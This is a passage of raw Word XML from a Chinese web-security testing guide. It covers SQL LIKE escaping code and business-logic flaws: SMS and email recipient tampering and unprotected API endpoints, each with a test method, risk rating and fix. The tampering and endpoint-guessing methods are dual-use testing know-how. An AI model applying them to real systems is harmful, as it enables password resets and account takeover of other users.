        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D289D" w:rsidRPr="00015E58" w14:paraId="67BB8ABB" w14:textId="77777777" w:rsidTr="007C11D1">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75963C"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private static string ConvertSqlForLike(string sql)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47117D6C"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p w14:paraId="05057B5E"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sql = sql.Replace("[",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5A848A"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p w14:paraId="319B6F3C"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hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="00015E58">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这句话一定要在下面两个语句之前，否则作为转义符的方括号会被当作数据被再次处理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3307271E"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sql = sql.Replace("_",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="347466F7"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_]");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="709EECFE"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sql = sql.Replace("%",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF6AF42"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p w14:paraId="158210B9"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returnsql;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6477EC92" w14:textId="515CBC4A"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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AC8D5EB" w14:textId="3E194E23" w:rsidR="008C28BD" w:rsidRPr="00015E58" w:rsidRDefault="00BD5E6D" w:rsidP="00015E58">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3B1003F" w14:textId="31C23F96" w:rsidR="00D2081F" w:rsidRPr="00AD537C" w:rsidRDefault="00D2081F" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc498434511"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务功能滥用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="5F49AB12" w14:textId="24441770" w:rsidR="008C28BD" w:rsidRPr="00A82BA3" w:rsidRDefault="00D2081F" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc498434512"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信定向转发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="081DF439" w14:textId="24A7A5B6"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="0087431D" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信接收人可任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329256B" w14:textId="3B65797C"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lastRenderedPageBreak/>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="0087431D" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截发送短</w:t>
      </w:r>
      <w:r w:rsidR="000B1FF1" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信的请求，将手机号改为测试人员的手机号，测试</w:t>
      </w:r>
      <w:r w:rsidR="0087431D" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否可接收短信验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527B6813" w14:textId="34479C20" w:rsidR="008C28BD" w:rsidRPr="00220735" w:rsidRDefault="00C24790" w:rsidP="00220735">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="008C28BD" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001B02BE" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞将验证码发送到自己的手机号上，重置他人密码或</w:t>
      </w:r>
      <w:r w:rsidR="00327E61" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转账。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635482D5" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C0EBB" w14:textId="08CA9226" w:rsidR="008C28BD" w:rsidRPr="00220735" w:rsidRDefault="00B96D0A" w:rsidP="00220735">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：短信接收人可任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12525D46" w14:textId="6E3983ED" w:rsidR="008C28BD" w:rsidRDefault="008C28BD" w:rsidP="00220735">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00CD7039" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送短信</w:t>
      </w:r>
      <w:r w:rsidR="008D32A7" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时手机号从当前会话中获取，避免从</w:t>
      </w:r>
      <w:r w:rsidR="00220957" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前端传入</w:t>
      </w:r>
      <w:r w:rsidR="008D32A7" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD7626A" w14:textId="40E76435" w:rsidR="00BD5E6D" w:rsidRPr="00220735" w:rsidRDefault="00BD5E6D" w:rsidP="00220735">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766D3A2" w14:textId="6B5EDA54" w:rsidR="008C28BD" w:rsidRPr="00A82BA3" w:rsidRDefault="009145B3" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc498434513"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件可定向转发</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="6045AA37" w14:textId="6F77879A"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00897415" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统发送邮件的接收人可由客户端任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E79DEB3" w14:textId="23C41DF5"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="000B1FF1" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截发送邮件的请求，将接收人邮箱改为测试人员的邮箱地址，测试是否可接收邮件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39272D2F" w14:textId="0BC7E06B" w:rsidR="008C28BD" w:rsidRPr="00220735" w:rsidRDefault="00C24790" w:rsidP="00220735">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="008C28BD" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A55558" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞将</w:t>
      </w:r>
      <w:r w:rsidR="001D5719" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件</w:t>
      </w:r>
      <w:r w:rsidR="00A55558" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送到自己的</w:t>
      </w:r>
      <w:r w:rsidR="001D5719" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱中</w:t>
      </w:r>
      <w:r w:rsidR="00A55558" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重置他人密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD2FC1" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421DC41F" w14:textId="1BDE3EF5" w:rsidR="008C28BD" w:rsidRPr="00220735" w:rsidRDefault="00966231" w:rsidP="00220735">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：邮件接收人可任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C864DE2" w14:textId="627666D7" w:rsidR="008C28BD" w:rsidRDefault="008C28BD" w:rsidP="00220735">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00CD7039" w:rsidRPr="00220735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送邮件时邮箱从当前会话中获取，避免从前端传入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FC2E15" w14:textId="72577AF5" w:rsidR="00BD5E6D" w:rsidRPr="00220735" w:rsidRDefault="00BD5E6D" w:rsidP="00220735">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9D14407" w14:textId="20DB6358" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="009145B3" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc498434514"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务接口调用缺陷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="6AC98D14" w14:textId="005F523B" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00360150" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用的业务接口存在缺陷，可以通过业务接口直接进行恶意操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829C507" w14:textId="5BACF23E" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="006E5242" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把业务逻辑和功能模块呈现的内容结合</w:t>
      </w:r>
      <w:r w:rsidR="00A95199" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，推测出隐藏的</w:t>
      </w:r>
      <w:r w:rsidR="00A95199" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00A95199" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口。如用户信息的接口是</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>://www.xxx.com/api/user/userInfo</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，推测重置密码接口可能是</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>://www.xxx.com/api/user/</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passReset</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，文件上传接口是</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>://www.xxx.com/api/user/</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uploadFile</w:t>
      </w:r>
      <w:r w:rsidR="00DC59DE" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。如果这些接口没有限制访问，则可以直接调用并提交数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C8542" w14:textId="25EE870A" w:rsidR="00BF205D" w:rsidRPr="00844517" w:rsidRDefault="00BF205D" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对开源或商业软件的业务接口调用缺陷可参考</w:t>
      </w:r>
      <w:r w:rsidR="00DB1139" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r w:rsidR="007F58A5" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用系统安全测试指导文档</w:t>
      </w:r>
      <w:r w:rsidR="00DB1139" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3DA55" w14:textId="11B4ACC6" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="00C24790" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BF205D" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过编写</w:t>
      </w:r>
      <w:r w:rsidR="00BF205D" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00BF205D" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举脚本，</w:t>
      </w:r>
      <w:r w:rsidR="00E215B5" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意调用敏感接口，从而进行提交数据等操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBD72D" w14:textId="77777777" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0AD38F" w14:textId="5A92150B" w:rsidR="009145B3" w:rsidRPr="00844517" w:rsidRDefault="00593925" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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通过业务接口能够操作核心业务内容，进行越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313E37EA" w14:textId="71176F97" w:rsidR="00593925" w:rsidRPr="00844517" w:rsidRDefault="00593925" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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w:t>
      </w:r>
      <w:r w:rsidR="007921B7" w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过业务接口能够获得重要敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B20FAA7" w14:textId="7FAA5E35" w:rsidR="007921B7" w:rsidRPr="00844517" w:rsidRDefault="007921B7" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00844517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：通过业务接口能够获得中等程度敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874F46A" w14:textId="44FF9CCE" w:rsidR="009145B3" w:rsidRDefault="009145B3" w:rsidP="00844517">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
